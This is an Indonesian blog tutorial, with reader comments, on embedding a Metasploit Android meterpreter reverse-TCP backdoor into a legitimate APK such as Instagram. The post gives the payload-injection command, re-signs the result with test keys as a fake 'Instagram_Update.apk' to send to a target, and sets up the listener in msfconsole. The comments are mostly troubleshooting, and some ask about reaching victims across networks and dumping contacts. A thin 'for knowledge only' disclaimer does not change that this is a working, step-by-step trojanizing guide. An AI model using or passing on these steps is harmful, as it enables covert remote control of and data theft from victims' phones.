Kalau untuk mengelabui target user windows dengan membuat backdoor dengan format file tertentu mungkin sudah biasa ya, karena memang sudah banyak module exploit yang digunakan untuk membuat backdoor dengan format file tertentu(.pdf, .doc, .rar). lalu bagaimana jika target exploit kita android, dan bagaimana untuk menyamarkan backdoor tersebut ? oke di bawah ini akan saya berikan contoh cara menyisipkan backdoor kedalam file apk.
Bagi yang mau mencoba bisa download bahannya disini
Extract file tersebut lalu masukkan file apk yang akan di sisipi backdoor ke dalam folder apk-embed jadi satu dengan apk-embed-payload.rb. sebagai contoh disini saya akan menyisipkan backdoor kedalam file apk instagram
Bagi yang mau mencoba bisa download bahannya disini
Extract file tersebut lalu masukkan file apk yang akan di sisipi backdoor ke dalam folder apk-embed jadi satu dengan apk-embed-payload.rb. sebagai contoh disini saya akan menyisipkan backdoor kedalam file apk instagram
Nah untuk memasukkan payload ke dalam file apk tersebut perintahnya seperti ini
ruby apk-embed-payload.rb [target.apk] [msfvenom options]Contoh
ruby apk-embed-payload.rb Instagram.apk -p android/meterpreter/reverse_tcp lhost=192.168.1.100 lport=1337
![ruby apk-embed-payload.rb [target.apk] [msfvenom options]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCz95rgAjAB8_vu0xOChhlXuYVAw-_jzx1OHvy0gQTyo7f4J_hD3JmqlDVZ97YZ1yTGprdnx4mTZouob4sjhZV_GKvZ5mDx5nGbUmKeAJjxO1WBuDaS0j8-jr7W5avuKMVFhXZqWzYhbI/s1600/embed-prosses.png "Cara Menyisipkan Backdoor kedalam File APK")
Tunggu hingga prossesnya selesai, jika berhasil nantinya akan ada file baru yang telah disisipi backdoor dengan nama namafile_backdoored.apk
Selanjutnya adalah melakukan SignApk, tujuannya agar file apk yang telah di sisipi backdoor tersebut bisa di install di semua device android.
Caranya, masukkan file apk hasil backdooring kedalam folder SignApk. lalu lakukan sign dengan perintah dibawah ini
java -jar signapk.jar testkey.x509.pem testkey.pk8 [file_asli.apk] [file_asli_hasilsign.apk]Contoh
java -jar signapk.jar testkey.x509.pem testkey.pk8 Instagram_backdoored.apk Instagram_Update.apk
![java -jar signapk.jar testkey.x509.pem testkey.pk8 [file_asli.apk] [file_asli_hasilsign.apk]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigpeKZSmm_fd7vtzO7a0epImIZU7-wqXsweIsRGlW1rXymVG_rsL80n6_MBZ8AfTUAkaUwFLkBVJHpK_5CBPubuA_RvKlAusKdBJWv47b3R1pSGoxR96KWySihYdHMJPaOO4tUzPlTXGA/s1600/java--jar-signapk.jar-testkey.x509.pem-testkey.pk8-%255Bfile_asli.apk%255D-%255Bfile_asli_hasilsign.apk%255D.png "Cara Menyisipkan Backdoor kedalam File APK")
Nah diatas file hasil sign saya beri nama Instagram_Update.apk dan file siap di kirim ke target. namun sebelumnya buka msfconsole, set seperti di bawah ini
Berikut ini adalah tampilan android target ketika menginstall file apk yang di sisipi backdoor tadi.
Tidak beda dengan aslinya kan
Namun begitu target mebuka aplikasi tersebut kita juga mendapatkan sesi meterpreternya
msfconsole
use exploit/multi/handlerlhost dan lport sesuaikan dengan yang kalian gunakan.
set payload android/meterpreter/reverse_tcp
set lhost 192.168.1.100
set lport 1337
exploit
Berikut ini adalah tampilan android target ketika menginstall file apk yang di sisipi backdoor tadi.
Namun begitu target mebuka aplikasi tersebut kita juga mendapatkan sesi meterpreternya
Bagi yang masih penasaran kalian bisa lihat video di bawah ini
Tutorial ini hanya ntuk pengetahuan semata, jika ada penyalahgunaan dari tutorial ini bukan tanggung jawab dari saya.
Saya harap dengan dibuatnya postingan ini dapat membuat kita agar lebih berhati-hati apabila mendownload aplikasi dari sumber yang tidak terpercaya. Selalu download aplikasi dari website resmi atau dari google play.
Oke, mungkin cukup itu yang bisa saya sampaikan mengenai Cara Menyisipkan Backdoor kedalam File Apk, semoga bermanfaat.
source https://gist.github.com/SkullTech
gan pas ane masukin backdoor ke apk, knapa ga masuk yaa bacaan nya no jarsigner
BalasHapusWhen i was added at bottom:
BalasHapus`d2j-apk-sign #{injected_apk}`
or
manualy sign file in terminal:
d2j-apk-sign file_backdoored.apk
apk file was working :)
kasih liat dong scriptnya broo
HapusKalau muncul no jarsigner buka new session dan ketik pkg install openjdk-17
HapusDan kembali jika muncul no apktool kembali ke session tadi dan ketik pkg install apktool
Gan Anher Minta Tema Kali linux nya dong..
BalasHapusGan... mau nanya nie, ane pake kali ver 2016.1 64bit kok gk bisa gan? apa file apk y kudu instagram? terima kasih
BalasHapusgak harus instagram kok, udah sy coba di apk lain dan berhasil, tapi ad juga beberapa file apk yg emg gk bisa d inject
HapusGan solusi no jarsigner gmna nih?
Hapusko ane pas ruby apk-embed-payload.rb langsung eror. tulisannya bla bla bla trakhirnya install fw trus ada link docs.google gitu, trus ada tulisan download 2 last ..... apa gtu lupa.
BalasHapusitu knpa?
untuk bisa masuk sesi meterpreternya harus konek internet tidak ? dan jika ya, harus pakai wlan0 atau eth0?
BalasHapusgan pass backdoorny di install ko muncul tulisan "kesalahan saat mengurai paket" itu kenapa mas anherr please answer :)
BalasHapusgan saat ketik ruby....muncul ruby command not found gimana gan ngatasinnya ?? minta pencerahan
BalasHapusBerarti belum terinstall rubynya
Hapusuntuk file zip yang di download apakah ada backdoornya? atau jangan jangan ada keyloggernya? mohon min di jawab.
BalasHapusdan apa ini bekerja di beda jaringan?
BalasHapusbisa di beda jaringan gan
Hapusapa caranya sama kayak yang di atas gan kalo untuk beda jaringan?
Hapusnyimak, eh btw biar terminal bisa di ringkas gitu gmn caranya?
HapusKomentar ini telah dihapus oleh pengarang.
BalasHapusbang mau nanya ini kenapa pas proses ruby apk-embed-payload.rb easytouch.apk -p android/meterpreter/reverse_tcp lhost=124.XXX.XX.XX lport=2080
BalasHapusmalah yang keluar bukan proses bikin backdoor nya malah keluar ini Apktool version Apktool v1.5.2.....jawab bang secepatnya,Terimakasih
#Kali_Linux_Rolling
Komentar ini telah dihapus oleh pengarang.
BalasHapusgan kok pas proses ruby apk-embed-payload.rb LINE.apk -p android/meterpreter/reverse_tcp lhost=192.168.xx.xxx lport=333
BalasHapuslangsung ada pemberitahuan .....
For additional info, see: http://code.google.com/p/android-apktool/
For smali/baksmali info, see: http://code.google.com/p/smali/
not supported, please download the latest 2. version from git.
malah keluar apktool version
mohon pencerahannya gan...
gan mau nanya setelah di inject backdoor apknya kok gk keluar namafile_backdoor.apk??
BalasHapusApa ini permanent gan ? Mohon bantuan ?
BalasHapusmin bisa minta tolong gk? kalo startup kali linux lamaaaaa buanget itu knpa ya?
BalasHapusKomentar ini telah dihapus oleh pengarang.
BalasHapusgan ane mau nanya,,, waktu dijalankan ruby apk-embed-payload.rb 3D-Chess-Game.apk -p android/meterpreter/reverse_tcp LHOST=192.168.43.86 LPORT=10001
BalasHapuskok malah muncul pemberitahuan kaya gini ya??
/usr/lib/ruby/2.3.0/rubygems/core_ext/kernel_require.rb:55:in `require': cannot load such file -- nokogiri/nokogiri (LoadError)
from /usr/lib/ruby/2.3.0/rubygems/core_ext/kernel_require.rb:55:in `require'
from /usr/lib/ruby/vendor_ruby/nokogiri.rb:29:in `rescue in '
from /usr/lib/ruby/vendor_ruby/nokogiri.rb:25:in `'
from /usr/lib/ruby/2.3.0/rubygems/core_ext/kernel_require.rb:55:in `require'
from /usr/lib/ruby/2.3.0/rubygems/core_ext/kernel_require.rb:55:in `require'
from apk-embed-payload.rb:9:in `'
Kasih pencerahan buat saya gan.... Makasih :D
gan ane mau nanya,,, waktu dijalankan ruby apk-embed-payload.rb 3D-Chess-Game.apk -p android/meterpreter/reverse_tcp LHOST=192.168.43.86 LPORT=10001
BalasHapuskok malah muncul pemberitahuan kaya gini ya??
/usr/lib/ruby/2.3.0/rubygems/core_ext/kernel_require.rb:55:in `require': cannot load such file -- nokogiri/nokogiri (LoadError)
from /usr/lib/ruby/2.3.0/rubygems/core_ext/kernel_require.rb:55:in `require'
from /usr/lib/ruby/vendor_ruby/nokogiri.rb:29:in `rescue in '
from /usr/lib/ruby/vendor_ruby/nokogiri.rb:25:in `'
from /usr/lib/ruby/2.3.0/rubygems/core_ext/kernel_require.rb:55:in `require'
from /usr/lib/ruby/2.3.0/rubygems/core_ext/kernel_require.rb:55:in `require'
from apk-embed-payload.rb:9:in `'
Kasih pencerahan buat saya gan.... Makasih :d
Cara mengetahui lhost nya gmn?
BalasHapusMaster sy mau tanya ketika apk originalnya sudah di masukan backdoor apa aplikasinya masih bisa berjalan seperti biasa ketika sudah di instal.??
BalasHapusMasih bisa bisa berjalan normal
HapusMau nanya mastah, itu ngirim result nya kemana?
BalasHapusKalo harus mantengin gitu mah cape-cape, mending pake teknik scampage.
kirain bisa ngirim result nya ke email -_-
Komentar ini telah dihapus oleh pengarang.
BalasHapusKomentar ini telah dihapus oleh pengarang.
BalasHapusMin Ane kan udah berhasil nih tapi kenapa klo eksekusi command nya selalu ada tulisan "Operation failed: 1" ?
BalasHapusbang itu pake metasploit/apa ?
BalasHapusGan kl di jaringan wifi,untuk lhostnya gemana gan
BalasHapusGan kl di jaringan wifi,untuk lhostnya gemana gan
BalasHapusMasuk backdoor nya gmna...Anher?
BalasHapuskalo beda jaringan gabisa ya om?
BalasHapusMakasih Work 100% Beda Jaringan..
BalasHapusNumpang Promote Sekalian https://ilmukomputer1313.blogspot.co.id/
Makasih
bang mau nanya kok pas proses ># java -jar signkapk.jar testkey.x509.pem testkey.pk8 instafollowers.apk instafollowers_backdoored.apk
BalasHapusError: Unable to access jarfile signkapk.jar
bacaannya eror trus cara mengetahui file hasilsign yang mana file awal saya namanya instafollowers.apk sesudah di inject menjadi instafollowers_backdoored.apk
mohon jawabannya
Bang minta apk yg sudah di susupi backdoor
BalasHapuswork tapi ketika pengen coba dump_contacts ada warning "error getting contacts list : bla bla bla" itu kira-kira kenapa ya mas?
BalasHapusbang kalo misalnya ane masukin backdoor ke apk instagram, dan di android korban itu udah keinstall instagram,nah kan kalo ane install backdoornya sama aja kaya update aplikasinya tuh, kira kira bisa ga?
BalasHapusbeda jaringan harus pakai vpn
BalasHapusandroid 7.1 nougat fc mulu gan
BalasHapus8-)
Maaf Admin, ane mau tanya. itu instagram versi berapa ya. saya pake instagram terbaru could not find smali file. tapi pas inject facebook lite itu work. Makasih sebelumnya. :D
BalasHapusbang setelah step ini kok gak ada file baru yg blakangnya backdored ya
BalasHapus[*] Signing Instagram_backdoored.apk ..
[+] Infected file Instagram_backdoored.apk ready
gan. gue cape bnget cari solusinya ni.
BalasHapusgue udah ikutin semua tutorial punya lo yg ini. . tapi waktu gw coba di andorid dalam satu jaringan, gw masukin ip address gw di andoid tersebut gak mau terbuka. . solusi dari lo dong gan?
apa di windows work gan anher
BalasHapusMin ane udah coba, tapi pas instal backdored.apknya kaga bisa, "Kesalaham mengurai paket" gimana tuh min?
BalasHapuspas mau diinstall ke android kok ps mau di buka . apk nya mental gan
BalasHapusKalau pake ahmyth gimana cara memasukan backdoornya kedalam apk ?
BalasHapusPerkenalkan, saya dari tim kumpulbagi. Saya ingin tau, apakah kiranya anda berencana untuk mengoleksi files menggunakan hosting yang baru?
BalasHapusJika ya, silahkan kunjungi website ini www.kbagi.com untuk info selengkapnya.
Di sana anda bisa dengan bebas share dan mendowload foto-foto keluarga dan trip, music, video, filem dll dalam jumlah dan waktu yang tidak terbatas, setelah registrasi terlebih dahulu. Gratis :)
mas saya mau naya bagaimana kita masuk kembali ke backdor setelah putus koneksi karena saya menggunakan ip publick
BalasHapus..balas ya mas
Min ini os linux yah?? Soalnya ane masih pake win 10?? Answer min
BalasHapus[*] Generating msfvenom payload..
BalasHapus[*] Signing payload..
[*] Decompiling orignal APK..
[*] Decompiling payload APK..
[*] Locating onCreate() hook..
[!] Unable to find correct hook automatically
ini gimana bang?
No jarsigner
BalasHapusterus om, ini gimana ya?
assalumalaikum.,,gan saya ada trouble nihh,,,saya menggunakan win 10 saya coba untuk embed apk itu dengan apk-embed-payload.rb tapi setelah saya coba,,gagal.dan minta untuk jarsigner di instal?? jaraigner tersebut gimana gan cara nya dan solusinya...
BalasHapusDi Lakukan Di Termux Bisa Apa Nggak ini??
BalasHapusMungkin bisa
HapusMin kalo pake linux d termux bisa gk buat nyisipkan trojannya
BalasHapusCommand ditermux beda kah
BalasHapuskalo perintah untuk termux apakah juga berbeda?
BalasHapus